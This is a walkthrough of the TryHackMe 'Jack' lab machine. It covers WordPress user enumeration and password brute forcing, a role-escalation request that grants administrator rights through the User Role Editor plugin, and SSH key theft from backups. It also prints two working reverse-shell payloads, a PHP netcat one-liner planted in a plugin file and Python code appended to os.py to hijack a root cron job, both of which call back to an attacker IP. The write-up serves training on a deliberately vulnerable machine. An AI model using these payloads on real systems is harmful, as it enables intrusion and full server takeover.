TryHackme — Jack Write up
By Shamsher khna This is a Writeup of Tryhackme room “Jack”
Setup
First, we will connect to the VPN. If you are not familiar with the process go through this room
Once we are connected we will deploy the machine (note that in the room description there is a request for you to add jack.thm to /etc/hosts):
Let’s add jack.thm to the /etc/hosts file you can use leafpad or vim for edit this file
Enumeration
nmap -T4 -sS -sC -sV jack.thm
We have Two Ports SSH =21 and HTTP=80 without username and password we can’t login through SSH. So Enumerate Port 80 Open Browser and search
http://jack.thm
From the nmap results, we can see the /wp-admin in the results which takes us to the WordPress login form, but we don’t have any credentials yet.
Using WPScan
wpscan - url jack.thm -e u
We can see XML-RPS is enabled which gives us few vulnerabilities A blog post here by +Bilal Rizwan
Users Found
With WPScan we know that the server is running WordPress 5.3.2 with XML-RPC enabled and has three users. With this information we will move on to exploiting WordPress.
Brute Force WordPress Login
We paste all three users in text file
echo user1 > users.txt;echo user2 >> users.txt;echo user3 >> users.txt#wpscan -U users.txt -P rockyou.txt - url http://jack.thm
We have a valid username and password login to WordPress.
At this point, I had to take a hint, because there were no plugins found via wpscan, and this user wasn’t an admin user, So We will use Searchsploit
searchsploit Plugin User role editor
Download exploit
searchsploit -m 44595This exploit tells that send a modified post request specifying the users privileges using ure_other_roles as part of updating a users profile
open Burp Suite, set the proxy on your browser and turn on intercept:
We can see that the section of the post request that may be vulnerable:
Now Compare this to the ruby module we download using searchsploit we can see that all parameter in the post request are set except for ure_other_roles:
So, let’s try adding this to our request and see if it does work:
&ure_other_roles=administratorWe modify our request and click forward in Burp:
When We forward our request . We have administrator access to WordPress and we can see under the plugins tab the vulnerable User Role Editor Plugin Version 4.24:
Getting a Shell
Go to plugin editor and paste this one linear code in Akismet.php
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4444 >/tmp/f") ?>
now click on update file
now click on Activate to get reverse-shell
We start our Listener
We have user www-data ,which has low privilege. We need to Escalate user jack .Checking out the reminder.txt file, we noticed something related to backups, so we do some enumeration and find a backups folder with an ssh key which we can use to login as jack.
List of files under /var/backups
We can login as user jack after changing the permissions of the id_rsa to 600
Then we try SSH:
ssh -i id_rsa jack@jack.thm
User.txt
Privilege Escalation to Root
Download pspy64
wget https://github.com/wildkindcc/Exploitation/blob/master/00.PostExp_Linux/pspy/pspy64Transfer this file into jack’s /tmp folder to run
Using pspy to monitor the processes that are running, we notice that root has a cronjob running every minute. The script is located at /opt/statuscheck/checker.py
The contents of the script shows that it imports the python module os
With all that information we discovered, it’s time to do some further enumeration. We noticed that the user jack is part of the family group which has the ability to write on any files under the /usr/lib/python2.7/ directory. This is good because the os module is under that directory and our user jack has write access to that module.
www-data@jack:/home/jack$ id jack
id jack
uid=1000(jack) gid=1000(jack) groups=1000(jack),4(adm),24(cdrom),30(dip),46(plugdev),115(lpadmin),116(sambashare),1001(family)
To exploit this, we edit the /usr/lib/python2.7/os.py module and add the following reverse shell all the way at the end
import socket
import ptys=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.X.X", 4444))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
pty.spawn("/bin/bash")
s.close()
We start a listener and wait 2 minute for the cronjob to run, and we get a root shell.
Thanks to the machine creator/s for this challenge.
follow on LinkedIn Instagram Twitter
Written by Shamsher khan
For more walkthroughs stay tuned…
Before you go…
Visit my other walkthrough’s:-
and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!
